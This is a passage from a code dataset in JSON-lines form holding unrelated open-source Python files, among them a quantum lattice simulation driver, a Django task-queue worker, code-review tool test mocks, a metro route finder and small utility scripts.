str(mu)\n\nsweepsTable = 'maxm minm cutoff niter noise\\n'\nfor row in zip(maxm, minm, cutoff, niter, noise):\n sweepsTable += ' '.join(row) + '\\n'\n\nparametersString = '''\nparameters {{{{\n L = {0}\n nmax = {1}\n nsweeps = {2}\n errgoal = {3}\n\n sweeps {{{{\n {4}\n }}}}\n\n quiet = {5}\n\n t = {{0}}\n N = {{1}}\n U = {{2}}\n mu = {{3}}\n}}}}\n'''.format(L, nmax, nsweeps, errgoal, sweepsTable, quiet)\n\nif sys.platform == 'darwin':\n appdir = '/Users/Abuenameh/Projects/ITensorDMRG/Release/'\nelif sys.platform == 'win32':\n appdir = 'C:/Users/abuenameh/Documents/Projects/ITensorDMRG/Release/'\nelif sys.platform == 'linux2':\n appdir = '/home/ubuntu/ITensorDMRG/Release/'\n\nif sys.platform == 'darwin':\n bhdir = '/tmp/BH-DMRG'\nelif sys.platform 
== 'linux2':\n bhdir = '/mnt/BH-DMRG'\nelif sys.platform == 'win32':\n bhdir = tempfile.mkdtemp()\n\nif not os.path.isdir(bhdir):\n os.makedirs(bhdir)\n\ndef rundmrg(it, t, iN, N):\n inputFile = open('itensor.{0}.{1}.in'.format(it, iN), 'w')\n inputFile.write(parametersString.format(t, N, U, mustr))\n inputFile.close()\n outputFileName = 'itensor.{0}.{1}.out'.format(it, iN)\n # print(subprocess.list2cmdline([appdir + 'ITensorDMRG', inputFile.name]))\n subprocess.call(subprocess.list2cmdline([appdir + 'ITensorDMRG', 'run', 'setup.dat', inputFile.name, outputFileName]), shell=True)\n\ndef pad(a, size, v):\n l = len(a)\n return np.concatenate((a,[v]*(size-l)))\n\ndef run(pipe):\n ts = np.linspace(0.01, 0.3, 15).tolist()\n # ti = int(sys.argv[5])\n # if ti >= 0:\n # ts = [ts[ti]]\n Ns = range(1, 2 * L + 1, 1)\n ts = np.linspace(0.01, 0.3, 5).tolist()\n # Ns = [4]\n # Ns = range(1, 5, 1)\n\n dims = [len(ts), len(Ns)]\n Edims = dims + [nsweeps]\n ndims = dims + [L]\n Cdims = dims + [L, L]\n\n trunc = np.zeros(dims)\n E0res = np.zeros(dims)\n runtimeres = np.zeros(dims)\n Eires = np.zeros(Edims)\n nres = np.zeros(ndims)\n n2res = np.zeros(ndims)\n Cres = np.zeros(Cdims)\n cres = np.zeros(Cdims)\n\n trunc.fill(np.NaN)\n E0res.fill(np.NaN)\n runtimeres.fill(np.NaN)\n Eires.fill(np.NaN)\n nres.fill(np.NaN)\n n2res.fill(np.NaN)\n Cres.fill(np.NaN)\n cres.fill(np.NaN)\n\n start = datetime.datetime.now()\n\n subprocess.call(subprocess.list2cmdline([appdir + 'ITensorDMRG', 'setup', 'setup.dat', str(L), str(nmax)]), shell=True)\n\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=numthreads) as executor:\n futures = [executor.submit(rundmrg, it, t, iN, N) for (it, t), (iN, N) in\n itertools.product(enumerate(ts), enumerate(Ns))]\n pickle.dump(len(futures), pipe)\n for future in concurrent.futures.as_completed(futures):\n pickle.dump(1, pipe)\n\n for it, iN in itertools.product(range(len(ts)), range(len(Ns))):\n try:\n outputFile = open('itensor.{0}.{1}.out'.format(it, iN), 'r')\n for line in outputFile:\n lineSplit = line.split()\n obs = lineSplit[0]\n val = np.array([float(s) for s in lineSplit[1:]])\n for case in switch(obs):\n if case('Ei'):\n Eires[it][iN] = pad(val, nsweeps, np.NaN)\n break\n if case('E0'):\n E0res[it][iN] = val[0]\n break\n if case('n'):\n nres[it][iN] = val\n break\n if case('n2'):\n n2res[it][iN] = val\n break\n if case('C'):\n Cres[it][iN] = np.split(val,L)\n break\n if case('runtime'):\n runtimeres[it][iN] = val[0]\n break\n outputFile.close()\n except Exception as e:\n print(e.message)\n\n\n end = datetime.datetime.now()\n\n resi = sys.argv[1]\n if sys.platform == 'darwin':\n resfile = '/Users/Abuenameh/Documents/Simulation Results/BH-ITensor-DMRG/res.' + str(resi) + '.txt'\n elif sys.platform == 'linux2':\n resfile = '/home/ubuntu/Dropbox/Amazon EC2/Simulation Results/BH-ITensor-DMRG/res.' + str(resi) + '.txt'\n elif sys.platform == 'win32':\n resfile = 'C:/Users/abuenameh/Dropbox/Server/BH-ITensor-DMRG/res.' 
+ str(resi) + '.txt'\n if not os.path.isdir(os.path.dirname(resfile)):\n os.makedirs(os.path.dirname(resfile))\n resf = open(resfile, 'w')\n res = ''\n res += 'delta[{0}]={1};\\n'.format(resi, delta)\n res += 'Lres[{0}]={1};\\n'.format(resi, L)\n res += 'nsweeps[{0}]={1};\\n'.format(resi, nsweeps)\n res += 'errgoal[{0}]={1};\\n'.format(resi, mathformat(errgoal))\n res += 'maxm[{0}]={1};\\n'.format(resi, mathformat(maxm))\n res += 'minm[{0}]={1};\\n'.format(resi, mathformat(minm))\n res += 'cutoff[{0}]={1};\\n'.format(resi, mathformat(cutoff))\n res += 'niter[{0}]={1};\\n'.format(resi, mathformat(niter))\n res += 'noise[{0}]={1};\\n'.format(resi, mathformat(noise))\n res += 'nmax[{0}]={1};\\n'.format(resi, nmax)\n res += 'Nres[{0}]={1};\\n'.format(resi, mathformat(Ns))\n res += 'tres[{0}]={1};\\n'.format(resi, mathformat(ts))\n res += 'mures[{0}]={1};\\n'.format(resi, mathformat(mu))\n res += 'Eires[{0}]={1};\\n'.format(resi, mathformat(Eires))\n res += 'E0res[{0}]={1};\\n'.format(resi, mathformat(E0res))\n res += 'nres[{0}]={1};\\n'.format(resi, mathformat(nres))\n res += 'n2res[{0}]={1};\\n'.format(resi, mathformat(n2res))\n res += 'Cres[{0}]={1};\\n'.format(resi, mathformat(Cres))\n try:\n res += 'runtimei[{0}]={1};\\n'.format(resi, timedeltaformat(runtimeres))\n except Exception as e:\n print(e.message)\n res += 'runtime[{0}]=\\\"{1}\\\";\\n'.format(resi, end - start)\n resf.write(res)\n\n\nif __name__ == '__main__':\n os.chdir(bhdir)\n [os.remove(f) for f in os.listdir(\".\")]\n proc = Popen(['python', os.path.dirname(os.path.realpath(__file__)) + '/ProgressDialog.py'], stdin=PIPE)\n pipe = proc.stdin\n run(pipe)\n proc.terminate()\n if sys.platform == 'win32':\n os.chdir(os.path.expanduser('~'))\n shutil.rmtree(bhdir)\n","repo_name":"Abuenameh/BH-DMRG","sub_path":"BH-ITensor.py","file_name":"BH-ITensor.py","file_ext":"py","file_size_in_byte":7682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"8715918740","text":"#!/usr/bin/env python3\n#coding=utf8\n\nimport configparser\nimport os\n\nconfigfile = os.environ[\"HOME\"] + \"/.translate2markdown/config.conf\"\ndefaultstoragepath = os.environ[\"HOME\"] + \"/Translate2markdown\"\n\n\nif(not os.path.exists(configfile)):\n os.makedirs(os.path.dirname(configfile),exist_ok=True)\n os.makedirs(defaultstoragepath, exist_ok=True)\n with open(configfile,\"w\") as f:\n f.write('''[global]\nautosave = True\nstoragePath = %s\n''' % defaultstoragepath)\n f.close()\n \nparser = configparser.ConfigParser()\nparser.read(configfile)\n\ndef isAutoSave():\n return True if(parser.get(\"global\", \"autosave\")) == \"True\" else False\n\ndef setAutoSave(autosave):\n parser.set(\"global\",\"autosave\", value=\"True\" if(autosave) else \"False\")\n with open(configfile,\"w\") as f:\n parser.write(f)\n f.close()\n\ndef getStoragePath():\n return parser.get(\"global\", \"storagePath\")\n\ndef setStoragePath(path):\n parser.set(\"global\", \"storagePath\", path)\n with open(configfile,\"w\") as f:\n parser.write(f)\n f.close()\n\n\n","repo_name":"camark/Translate2Markdown","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"5322806602","text":"import functools\nfrom pyke import fc_rule, immutable_dict\n\nclass bc_rule(fc_rule.rule):\n ''' This represents a single backward-chaining rule. 
Most of its\n behavior is inherited.\n '''\n def __init__(self, name, rule_base, goal_name, bc_fn, plan_fn,\n goal_arg_patterns, plan_vars, patterns):\n super(bc_rule, self).__init__(name, rule_base, patterns)\n self.goal_name = goal_name\n self.orig_bc_fn = bc_fn\n self.bc_fn = bc_fn\n self.plan_fn = plan_fn\n self.goal_arg_pats = goal_arg_patterns\n self.plan_vars = plan_vars\n rule_base.add_bc_rule(self)\n\n def goal_arg_patterns(self):\n return self.goal_arg_pats\n\n def make_plan(self, context, final):\n return functools.partial(self.plan_fn,\n immutable_dict.immutable_dict(\n (var_name, context.lookup_data(var_name, final=final))\n for var_name in self.plan_vars))\n\n def trace(self):\n self.bc_fn = self.surrogate\n\n def surrogate(self, rule, arg_patterns, arg_context):\n print(\"%s.%s%s\" % (rule.rule_base.root_name, rule.name,\n tuple(arg.as_data(arg_context, True)\n for arg in arg_patterns)))\n for prototype_plan in self.orig_bc_fn(rule, arg_patterns, arg_context):\n print(\"%s.%s succeeded with %s\" % \\\n (rule.rule_base.root_name, rule.name,\n tuple(arg.as_data(arg_context, True)\n for arg in arg_patterns)))\n yield prototype_plan\n print(\"%s.%s failed\" % (rule.rule_base.root_name, rule.name))\n\n def untrace(self):\n self.bc_fn = self.orig_bc_fn\n\n","repo_name":"nvitucci/pyke","sub_path":"pyke/bc_rule.py","file_name":"bc_rule.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"17959011663","text":"from .common import Common\n\n\nclass TestFsmLocation(Common):\n def test_project_count(self):\n location = self.location\n project = self.project\n self.assertEqual(location.project_count, 0)\n project.write({\"fsm_location_id\": location.id})\n location.invalidate_model()\n self.assertEqual(location.project_count, 1)\n\n def test_action_view_project(self):\n location = self.location\n project = self.project\n action = location.action_view_project()\n action_domain = action.get(\"domain\")\n res_id = action.get(\"res_id\")\n self.assertEqual(action_domain, [(\"id\", \"in\", [])])\n self.assertFalse(res_id)\n project.write({\"fsm_location_id\": location.id})\n action = location.action_view_project()\n res_id = action.get(\"res_id\")\n self.assertEqual(res_id, project.id)\n","repo_name":"OCA/field-service","sub_path":"fieldservice_project/tests/test_fsm_location.py","file_name":"test_fsm_location.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"53"} +{"seq_id":"37750565509","text":"from os.path import join, dirname\nimport yaml\nimport github\nimport gitlab\nfrom github.GithubException import UnknownObjectException\nfrom gitlab.exceptions import GitlabGetError\nfrom collections import namedtuple\nimport datetime\nfrom reviewrot.basereview import LastComment\nfrom reviewrot.phabricatorstack import PhabricatorReview\n\n\nwith open(join(dirname(__file__), \"test_githubtest.yaml\"), \"r\") as f:\n github_config = yaml.safe_load(f)\n\nwith open(join(dirname(__file__), \"test_gitlabtest.yaml\"), \"r\") as f:\n gitlab_config = yaml.safe_load(f)\n\n# github\n\n\ndef mock_get_user(user_name):\n raise UnknownObjectException(\"param1\", \"param2\")\n\n\ndef mock_get_user_(user_name):\n res = github.NamedUser.NamedUser(\n \"param1\", \"param2\", {\"login\": user_name}, \"param3\"\n )\n return res\n\n\ndef mock_get_repos():\n repo = github.Repository.Repository(\"param1\", \"param2\", \"param3\", 
\"param4\")\n res = []\n res.append(repo)\n return res\n\n\ndef mock_github_get_reviews(\n uname,\n repo_name,\n age=None,\n show_last_comment=None,\n):\n msg = [github_config[\"msg\"]]\n return msg\n\n\ndef mock_get_repo(repo_name):\n raise UnknownObjectException(\"args\", \"kwargs\")\n\n\ndef mock_get_repo_(repo_name):\n repo = github.Repository.Repository(\"param1\", \"param2\", \"param3\", \"param4\")\n return repo\n\n\ndef mock_get_pulls():\n return []\n\n\n# for mocking user in comments\nUser = namedtuple(\"User\", (\"login\"))\n\n\nclass FakeGithubComment:\n \"\"\"\n Mock comments in pull requests\n \"\"\"\n\n def __init__(self, author, body, created_at):\n self.user = User(login=author)\n self.body = body\n self.created_at = created_at\n\n\nclass FakeGithubPaginatedList:\n \"\"\"\n Mocks PaginatedList containing comments\n \"\"\"\n\n def __init__(self, comments):\n self.comments = comments\n self.totalCount = len(comments)\n\n @property\n def reversed(self):\n return list(reversed(self.comments))\n\n\n# gitlab\n\n\ndef mock_projects_get(user_name, repo_name):\n return GitlabGetError()\n\n\ndef mock_projects_get_():\n return gitlab.Gitlab.projects.create({\"name\": \"project\"})\n\n\ndef mock_auth():\n return True\n\n\ndef mock_groups_search(user_name):\n return []\n\n\ndef mock_gitlab_get_reviews(\n uname,\n project,\n age=None,\n show_last_comment=None,\n):\n msg = [gitlab_config[\"msg\"]]\n return msg\n\n\nclass FakeProjectMergeRequestNote:\n \"\"\"\n Mocks discussion note in merge requests\n \"\"\"\n\n def __init__(self, system, author, created_at, body):\n self.system = system\n self.author = {\"username\": author}\n self.created_at = created_at\n self.body = body\n\n\n# Phabricator\n\ndef mock_phabricator_differential_query(status, responsibleUsers, phab):\n class MockResponse:\n def __init__(self, json_data, status):\n self.json_data = json_data\n self.status = status\n\n def json(self):\n return self.json_data\n\n def next(self):\n return\n\n def getresponse(self):\n return self.json_data\n\n res = [\n {\n 'reviewers': [\n 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'PHID-USER-xxxxxxxxxxxxxxxxxxxx'\n ],\n 'lineCount': '2',\n 'repositoryPHID': None,\n 'id': 1706,\n 'authorPHID': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'title': 'Title 1',\n 'activeDiffPHID': 'PHID-DIFF-xxxxxxxxxxxxxxxxxxxx',\n 'branch': 'new_input_data',\n 'dateModified': '1553524722',\n 'status': '2',\n 'testPlan': '',\n 'commits': [],\n 'dateCreated': '1553065630',\n 'hashes': [],\n 'properties': [],\n 'diffs': [\n '3605',\n '3599'\n ],\n 'phid': 'PHID-DREV-xxxxxxxxxxxxxxxxxxxx',\n 'uri': 'dummy.url',\n 'css': [],\n 'summary': 'This is a summary.',\n 'statusName': 'Accepted'\n },\n ]\n return res\n\n\ndef mock_phabricator_get_comments(id, phab):\n return [\n {\n 'action': 'comment',\n 'authorPHID': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'revisionID': id,\n 'content': 'This is some content',\n 'dateCreated': '1551763640'\n }\n ]\n\ndef mock_phabricator_get_comments_(id, phab):\n return [\n {\n 'action': 'comment',\n 'authorPHID': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'revisionID': id,\n 'content': 'This is some content',\n 'dateCreated': '1551763640'\n },\n {\n 'action': 'comment',\n 'authorPHID': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'revisionID': id,\n 'content': 'This is some content',\n 'dateCreated': '1551763640'\n },\n {\n 'action': 'comment',\n 'authorPHID': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'revisionID': id,\n 'content': 'This is some content',\n 'dateCreated': '1551763640'\n }\n ]\n\n\ndef 
mock_phabricator_get_reviews(phab, reviews, host, age, show_last_comment,\n raw_response):\n res = []\n date_created = datetime.datetime.strptime('16Sep2012', '%d%b%Y')\n date_modified = datetime.datetime.strptime('16Sep2012', '%d%b%Y')\n last_comment = LastComment(author='user_name',\n body='content',\n created_at=date_modified)\n temp = PhabricatorReview(user='user_name',\n title='Title 1',\n url='dummy.url',\n time=date_created,\n updated_time=date_modified,\n comments=2,\n image='https://authorImage.com',\n last_comment=last_comment,\n project_name='Phabricator',\n project_url='www.google.com')\n res.append(temp)\n return res\n\n\ndef mock_phabricator_get_last_comment(comments, phab, raw_response):\n createdAt = datetime.datetime.strptime('16Sep2018', '%d%b%Y')\n return LastComment(author='user_name',\n body='This is some content',\n created_at=createdAt)\n\n\ndef mock_phabricator_user_query_ids(phids, phab):\n return [\n {\n 'userName': 'dummy_user',\n 'phid': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'realName': 'Dummy User',\n 'roles': [\n 'verified', 'approved', 'activated'\n ],\n 'image': 'userimage.com',\n 'uri': 'userurl.com'\n }\n ]\n\ndef mock_phabricator_author_data(author_phid, raw_response, phab):\n user = {\n 'userName': 'dummy_user',\n 'phid': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'realName': 'Dummy User',\n 'roles': [\n 'verified', 'approved', 'activated'\n ],\n 'image': 'userimage.com',\n 'uri': 'userurl.com'\n }\n\n raw_response = [\n {\n 'userName': 'dummy_user',\n 'phid': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'realName': 'Dummy User',\n 'roles': [\n 'verified', 'approved', 'activated'\n ],\n 'image': 'userimage.com',\n 'uri': 'userurl.com'\n }\n ]\n return user, raw_response\n\n\ndef mock_phabricator_user_serach(username, phab):\n return {\n 'cursor': {\n 'after': None,\n 'limit': 100,\n 'order': None,\n 'before': None\n },\n 'maps': {},\n 'data': [\n {\n 'fields': {\n 'username': 'dummyuser',\n 'realName': 'Dummy User',\n 'roles': [\n 'verified',\n 'approved',\n 'activated'],\n 'dateCreated': 1509530187,\n 'policy': {\n 'edit': 'no-one',\n 'view': 'public'},\n 'dateModified': 1509530333},\n 'phid': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'type': 'USER',\n 'id': 86,\n 'attachments': {}}],\n 'query': {\n 'queryKey': None\n }\n }\n\ndef mock_phabricator_raw_response():\n return [\n {\n 'userName': 'user1',\n 'phid': 'PHID-USER-xxxxxxxxxxxxxxxxxx',\n 'realName': 'user 1',\n 'roles': [\n 'verified',\n 'approved',\n 'activated'\n ],\n 'image': 'user1.image',\n 'uri': 'user1.url'\n },\n {\n 'userName': 'user2',\n 'phid': 'PHID-USER-xxxxxxxxxxxxxxxxxx',\n 'realName': 'user 2',\n 'roles': [\n 'verified',\n 'approved',\n 'activated'\n ],\n 'image': 'user2.image',\n 'uri': 'user2.url'\n },\n {\n 'userName': 'user3',\n 'phid': 'PHID-USER-test',\n 'realName': 'user 3',\n 'roles': [\n 'verified',\n 'approved',\n 'activated'\n ],\n 'image': 'user3.image',\n 'uri': 'user3.url'\n }\n ]\n\ndef mock_phabricator_update_interfaces():\n return\n\ndef mock_phabricator_time_from_epoch(epoch_time):\n return datetime.datetime.strptime('16Sep2012', '%d%b%Y')\n\n\nclass FakeReview:\n \"\"\"\n Mocks small part of BaseReview\n \"\"\"\n\n def __init__(self, title):\n self.title = title\n","repo_name":"sidpremkumar/review-rot","sub_path":"test/test_mock.py","file_name":"test_mock.py","file_ext":"py","file_size_in_byte":10180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"4509805151","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLibrary to manage everything about 
date and time.\n\"\"\"\n\n__version__ = \"1.0.1\"\n__author__ = \"Sorawee Porncharoenwase\"\n\nimport sys, datetime\n\ndef wrapMonth(m):\n \"\"\"Convert zero-based month number to zero-based month number.\"\"\"\n m -= 1\n if m < 0:\n m += 12\n if m >= 12:\n m -= 12\n return m\n\ndef weekdayThai(d):\n \"\"\"Return Thai name of days of the week.\"\"\"\n return map(lambda x: u\"วัน\" + x, \n [u\"จันทร์\", u\"อังคาร\", u\"พุธ\", u\"พฤหัสบดี\", u\"ศุกร์\",\n u\"เสาร์\", u\"อาทิตย์\"])[d]\n\ndef monthEng(m):\n \"\"\"Return English name of month.\"\"\"\n return [u\"January\", u\"February\", u\"March\", u\"April\", u\"May\", u\"June\", \n u\"July\", u\"August\", u\"September\", u\"October\", u\"November\",\n u\"December\"][wrapMonth(m)]\n\ndef monthThai(m):\n \"\"\"Return Thai name of month.\"\"\"\n return [u\"มกราคม\", u\"กุมภาพันธ์\", u\"มีนาคม\", u\"เมษายน\", u\"พฤษภาคม\",\n u\"มิถุนายน\", u\"กรกฎาคม\", u\"สิงหาคม\", u\"กันยายน\", u\"ตุลาคม\",\n u\"พฤศจิกายน\", u\"ธันวาคม\"][wrapMonth(m)]\n \ndef monthThaiAbbr(m):\n \"\"\"Return Thai abbreviated name of month.\"\"\"\n return [u\"ม.ค.\", u\"ก.พ.\", u\"มี.ค.\", u\"เม.ย.\", u\"พ.ค.\", u\"มิ.ย.\", \n u\"ก.ค.\", u\"ส.ค.\", u\"ก.ย.\", u\"ต.ค.\", u\"พ.ย.\", u\"ธ.ค.\"][wrapMonth(m)]\n\ndef getNumDay(year, month):\n \"\"\"Return length of day in given month\"\"\"\n if month == 2:\n if year % 400 == 0:\n return 29\n elif year % 100 == 0:\n return 28\n elif year % 4 == 0:\n return 29\n else:\n return 28\n \n return [0, 31, 0, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31][month]\n\nclass date(datetime.date):\n \"\"\"date class\"\"\"\n","repo_name":"nullzero/wp","sub_path":"lib/libdate.py","file_name":"libdate.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"3924649413","text":"transfer_stations = [\n i.split(' - ')\n for i in [\n 'Гостиный двор - Невский проспект',\n 'Спасская - Садовая - Сенная площадь',\n 'Технологический институт I - Технологический институт II',\n 'Пушкинская - Звенигородская',\n 'Владимирская - Достоевская',\n 'Маяковская - Площадь восстания',\n 'Площадь Александра Невского I - Площадь Александра Невского II',]\n]\nclass Station:\n counter = 0\n def __init__(self, name, line):\n self.name = name\n self.line = line\n self.number = Station.counter\n self.linked_stations = []\n Station.counter += 1\n def __repr__(self):\n return f'Станция \"{self.name}\"'\n\nlists = [\n (\n 'Девяткино',\n 'Гражданский проспект',\n 'Академическая',\n 'Политехническая',\n 'Площадь мужества',\n 'Лесная',\n 'Выборгская',\n 'Площадь ленина',\n 'Площадь восстания',\n 'Владимирская',\n 'Пушкинская',\n 'Технологический институт I',\n 'Балтийская',\n 'Нарвская',\n 'Кировский завод',\n 'Автово',\n 'Ленинский проспект',\n 'Проспект ветеранов'\n ),\n (\n 'Парнас',\n 'Проспект просвещения',\n 'Озерки',\n 'Удельная',\n 'Пионерская',\n 'Черная речка',\n 'Петроградская',\n 'Горьковская',\n 'Невский проспект',\n 'Сенная площадь',\n 'Технологический институт II',\n 'Фрунзенская',\n 'Московские ворота',\n 'Электросила',\n 'Парк победы',\n 'Московская',\n 'Звёздная',\n 'Купчино',\n ),\n (\n 'Беговая',\n 'Зенит',\n 'Приморская',\n 'Василеостровская',\n 'Гостиный двор',\n 'Маяковская',\n 'Площадь Александра Невского I',\n 'Елизаровская',\n 'Ломоносовская',\n 'Пролетарская',\n 'Обухово',\n 'Рыбацкое'\n ),\n (\n 'Спасская',\n 'Достоевская',\n 'Лиговский проспект',\n 'Площадь Александра Невского II',\n 'Новочеркасская',\n 'Ладожская',\n 'Проспект Большевиков',\n 'Улица Дыбенко'\n 
),\n (\n 'Комендантский проспект',\n 'Старая деревня',\n 'Крестовский остров',\n 'Чкаловская',\n 'Спортивная',\n 'Адмиралтейская',\n 'Садовая',\n 'Звенигородская',\n 'Обводный канал',\n 'Волковская',\n 'Бухарестская',\n 'Международная',\n 'Проспект славы',\n 'Дунайская',\n 'Шушары'\n )\n]\n\nstations = {}\nfor line in range(len(lists)):\n line_stations = lists[line]\n for i in range(len(line_stations)):\n station = Station(line_stations[i], line)\n stations[line_stations[i].lower()] = station\n if i > 0:\n station.linked_stations.append(stations[line_stations[i - 1].lower()])\n stations[line_stations[i - 1].lower()].linked_stations.append(station)\n\nfor i in transfer_stations:\n for j in i:\n station = stations[j.lower()]\n for transfer_station in i:\n transfer_station = stations[transfer_station.lower()]\n if transfer_station.number == station.number:\n continue\n\n station.linked_stations.append(transfer_station)\n\nfirst_station = input()\nnext_station = input()\n\nclass VisitedPoint:\n def __init__(self, point: str, steps: int):\n self.point = point\n self.steps = steps\n\nclass Walker:\n def __init__(self, stations: 'dict[str, set[str]]'):\n self.visited_points = {}\n self.stations = stations\n self.path = None\n\n def solve(self, current: str, to: str, number: int = 0):\n value: VisitedPoint = self.visited_points.get(current)\n if not value or value.steps > number:\n self.visited_points[current] = VisitedPoint(current, number)\n else:\n return\n if current == to:\n return\n for station in self.stations[current]:\n self.solve(station, to, number + 1)\n\n def breadth_first_search(self, from_station, to_station):\n if isinstance(from_station, str):\n from_station = stations[from_station.lower()]\n if isinstance(to_station, str):\n to_station = stations[to_station.lower()]\n\n to_browse = [(from_station,)]\n while to_browse:\n path = to_browse[0]\n del to_browse[0]\n for i in path[-1].linked_stations:\n if i.number == to_station.number:\n self.path = path + (i,)\n return self.path\n if i in path:\n continue\n to_browse.append(path + (i,))\n\n def depth_first_search(self, from_station, to_station, path=()):\n if isinstance(from_station, str):\n from_station = stations[from_station.lower()]\n if isinstance(to_station, str):\n to_station = stations[to_station.lower()]\n\n path += (from_station, )\n\n for i in path[-1].linked_stations:\n if i.number == to_station.number:\n return path + (i,)\n\n if i in path:\n continue\n\n result = self.depth_first_search(i, to_station, path)\n if result:\n if self.path is None:\n self.path = result\n return result\n elif len(self.path) > len(result):\n self.path = result\n return result\n\nwalker = Walker(stations)\n\nprint(walker.breadth_first_search(first_station, next_station))\nwalker.depth_first_search(first_station, next_station)\nprint(walker.path)\n","repo_name":"rumintsev/Labs","sub_path":"31.10.23/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":6753,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5745518477","text":"from check_similarity import SimilarityCheck\nfrom config import BaseOptions\nfrom perform_embedding import Embed\nfrom perform_extraction import Extract\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning) \n\n\nif __name__ == '__main__':\n opt = BaseOptions().parse() # get training options\n\n if opt.emb:\n print(\"Embedding\")\n encrypt = Embed(opt)\n encrypt.integrate_embedding()\n elif opt.ext:\n print(\"Extracting\")\n 
decrypt = Extract(opt)\n decrypt.integrate_extraction()\n elif opt.check_similarity:\n print(\"Checking Similarity\")\n similarity_check = SimilarityCheck(opt)\n similarity_check.check_similarity_all_images()\n similarity_check.copy_similar_images()","repo_name":"mannam95/dct_svd_in_dwt_watermark","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34959313911","text":"import logging\nimport signal\nimport time\nimport os\n\nfrom django.core.management.base import BaseCommand\nfrom django.db import connection\n\n\nclass Worker(BaseCommand):\n # The queue to process. Subclass and set this.\n queue = None\n logger = logging.getLogger(__name__)\n\n def add_arguments(self, parser):\n parser.add_argument(\n '--delay',\n type=float,\n default=1,\n help=\"The number of seconds to wait to check for new tasks.\",\n )\n parser.add_argument(\n '--listen',\n action='store_true',\n help=\"Use LISTEN/NOTIFY to wait for events.\"\n )\n\n def handle_shutdown(self, sig, frame):\n if self._in_task:\n self.logger.info('Waiting for active tasks to finish...')\n self._shutdown = True\n else:\n raise InterruptedError\n\n def run_available_tasks(self):\n \"\"\"\n Runs tasks continuously until there are no more available.\n \"\"\"\n # Prevents tasks that failed from blocking others.\n failed_tasks = set()\n while True:\n self._in_task = True\n result = self.queue.run_once(exclude_ids=failed_tasks)\n job, retval, exc = result or (None, None, None)\n if exc:\n if job:\n self.logger.exception('Error in %r: %r.', job, exc, extra={\n 'data': {\n 'job': job.to_json(),\n },\n })\n failed_tasks.add(job.id)\n else:\n # This is an exception before a task could even be\n # retrieved, so it's probably fatal\n raise exc\n self._in_task = False\n if self._shutdown:\n raise InterruptedError\n if not job:\n break\n\n def handle(self, **options):\n self._shutdown = False\n self._in_task = False\n\n self.delay = options['delay']\n self.listen = options['listen']\n\n with connection.cursor() as cursor:\n cursor.execute(\"SET application_name TO %s\", ['dpq#{}'.format(os.getpid())])\n\n if self.listen:\n self.queue.listen()\n try:\n # Handle the signals for warm shutdown.\n signal.signal(signal.SIGINT, self.handle_shutdown)\n signal.signal(signal.SIGTERM, self.handle_shutdown)\n\n while True:\n self.run_available_tasks()\n self.wait()\n except InterruptedError:\n # got shutdown signal\n pass\n\n def wait(self):\n if self.listen:\n count = len(self.queue.wait(self.delay))\n self.logger.debug('Woke up with %s NOTIFYs.', count)\n return count\n else:\n time.sleep(self.delay)\n return 1\n","repo_name":"gavinwahl/django-postgres-queue","sub_path":"dpq/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"53"} +{"seq_id":"39056571313","text":"#!/usr/bin/python3\n\"\"\"script takes a URL, sends a request to the URL\nand displays the value of the X-Request-Id variable\nfound in the header of the response.\n\"\"\"\n\nif __name__ == \"__main__\":\n import sys\n import urllib.request\n\n url = sys.argv[1]\n req = urllib.request.Request(url)\n with urllib.request.urlopen(req) as res:\n headers = res.info()\n 
print(headers['X-Request-Id'])\n","repo_name":"stephenoba/alx-higher_level_programming","sub_path":"0x11-python-network_1/1-hbtn_header.py","file_name":"1-hbtn_header.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"7079513736","text":"'''Write a tuple with the months of the year, then ask the user for a number; the number entered is the month that must be shown from the tuple'''\n\nmeses = ('Enero', 'Febrero', 'Marzo', 'Abril', 'Mayo', 'Junio', 'Julio', 'Agosto', 'Septiembre', 'Octubre', 'Noviembre', 'Diciembre')\nencontrado = False\naux = int(input('Enter a number: '))\n\nfor i in range(len(meses)):\n if aux == i + 1:\n print(meses[i])\n encontrado = True\n break\n\nif(not(encontrado)):\n print('Month not found')\n","repo_name":"Ivoo25/Python3","sub_path":"Seccion 12 - Estructuras de Datos/Ejercicio1.py","file_name":"Ejercicio1.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
